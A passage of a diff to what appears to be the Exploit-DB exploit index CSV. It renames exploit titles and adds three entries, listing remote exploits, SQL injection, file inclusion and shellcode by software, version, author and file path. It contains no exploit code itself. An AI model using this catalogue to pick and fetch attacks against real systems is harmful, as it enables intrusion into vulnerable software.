IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 -16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16482,platforms/windows/remote/16482.rb,"Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16484,platforms/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0 @@ -10929,7 +10933,7 @@ id,file,description,date,author,platform,type,port 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,windows,remote,0 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 -16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 +16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,windows,remote,0 17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 @@ -11083,7 +11087,7 @@ id,file,description,date,author,platform,type,port 18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 -18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 +18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0 18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0 18093,platforms/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure Exploit",2011-11-07,"David Maman",windows,remote,0 @@ -11104,7 +11108,7 @@ id,file,description,date,author,platform,type,port 18190,platforms/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit)",2011-12-13,Metasploit,windows,remote,0 -18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 +18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0 @@ -11229,8 +11233,8 @@ id,file,description,date,author,platform,type,port 19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit",1998-06-30,"Jeff Forristal",multiple,remote,0 19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 -19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 -19092,platforms/multiple/remote/19092.py,"MySQL - Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 +19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 +19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 @@ -12357,7 +12361,7 @@ id,file,description,date,author,platform,type,port 22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0 22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0 22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0 -22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection",2012-10-19,xistence,multiple,remote,0 +22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection",2012-10-19,xistence,multiple,remote,0 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0 @@ -12599,7 +12603,7 @@ id,file,description,date,author,platform,type,port 23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - '.SMIL' File Script Execution",2003-08-19,KrazySnake,windows,remote,0 23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",windows,remote,0 23049,platforms/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote,0 -23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise",2003-08-23,kf,linux,remote,0 +23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Code Execution",2003-08-23,kf,linux,remote,0 23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun",2003-08-27,storm,windows,remote,0 23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal",2003-08-30,sickle,windows,remote,0 23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0 @@ -15122,6 +15126,9 @@ id,file,description,date,author,platform,type,port 40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0 40858,platforms/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",hardware,remote,0 40862,platforms/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,windows,remote,0 +40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0 +40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0 +40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16451,7 +16458,7 @@ id,file,description,date,author,platform,type,port 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 -2259,platforms/php/webapps/2259.txt,"proManager 0.73 - (note.php) SQL Injection",2006-08-26,Kacper,php,webapps,0 +2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution",2006-08-27,Kacper,php,webapps,0 2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0 @@ -16573,7 +16580,7 @@ id,file,description,date,author,platform,type,port 2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0 2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0 -2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - (nbs) Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 +2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 @@ -16735,7 +16742,7 @@ id,file,description,date,author,platform,type,port 2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion",2006-10-19,Kacper,php,webapps,0 2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 -2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion",2006-10-19,x_w0x,php,webapps,0 +2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,php,webapps,0 2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0 2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0 2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 @@ -17238,7 +17245,7 @@ id,file,description,date,author,platform,type,port 3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0 3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 -3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - (path_to_smf) Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0 +3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0 3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - (fcring.php s_fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 @@ -17393,7 +17400,7 @@ id,file,description,date,author,platform,type,port 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) Blind SQL Injection",2007-04-01,ajann,php,webapps,0 -3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 +3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps,0 3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0 @@ -17581,14 +17588,14 @@ id,file,description,date,author,platform,type,port 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 +3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 -3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0 +3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 @@ -17771,7 +17778,7 @@ id,file,description,date,author,platform,type,port 4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 -4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 +4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0 @@ -17994,7 +18001,7 @@ id,file,description,date,author,platform,type,port 4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0 4628,platforms/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0 4629,platforms/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0 -4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 +4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 4632,platforms/php/webapps/4632.txt,"Vigile CMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 @@ -18335,7 +18342,7 @@ id,file,description,date,author,platform,type,port 5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0 5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' Parameter SQL Injection",2008-02-12,NTOS-Team,php,webapps,0 -5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 +5103,platforms/php/webapps/5103.txt,"Joomla! Component Rapid Recipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 @@ -18810,61 +18817,61 @@ id,file,description,date,author,platform,type,port 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0 5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0 -5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 +5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0 5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0 5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0 -5724,platforms/php/webapps/5724.txt,"pLog - 'albumID' SQL Injection",2008-06-02,DreamTurk,php,webapps,0 -5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 +5724,platforms/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' Parameter SQL Injection",2008-06-02,DreamTurk,php,webapps,0 +5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - SQL Injection / Cross-Site Scripting",2008-06-02,"CWH Underground",php,webapps,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 -5729,platforms/php/webapps/5729.txt,"Joomla! Component joomradio 1.0 - 'id' SQL Injection",2008-06-03,His0k4,php,webapps,0 +5729,platforms/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection",2008-06-03,His0k4,php,webapps,0 5730,platforms/php/webapps/5730.txt,"Joomla! Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0 -5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - (comment.asp) SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 +5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - 'comment.asp' SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 5733,platforms/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla! Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps,0 -5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0 +5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script 1.0.1 - Code Execution",2008-06-03,JIKO,php,webapps,0 5737,platforms/php/webapps/5737.pl,"Joomla! Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0 -5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 -5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - (gbid) SQL Injection",2008-06-04,ZAMUT,php,webapps,0 -5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 +5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting",2008-06-04,"CWH Underground",php,webapps,0 +5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection",2008-06-04,ZAMUT,php,webapps,0 +5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - SQL Injection / Cross-Site Scripting",2008-06-05,"CWH Underground",php,webapps,0 5743,platforms/php/webapps/5743.txt,"Joomla! Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 -5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 -5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0 -5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 +5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection",2008-06-05,MustLive,php,webapps,0 +5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' Parameter SQL Injection",2008-06-05,anonymous,php,webapps,0 +5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection",2008-06-05,His0k4,php,webapps,0 5752,platforms/php/webapps/5752.pl,"Joomla! Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 -5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0 -5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 -5755,platforms/php/webapps/5755.pl,"Joomla! Component yvcomment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0 +5753,platforms/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection",2008-06-08,Zigma,asp,webapps,0 +5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting",2008-06-08,"CWH Underground",php,webapps,0 +5755,platforms/php/webapps/5755.pl,"Joomla! Component yvComment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,php,webapps,0 -5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0 +5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0 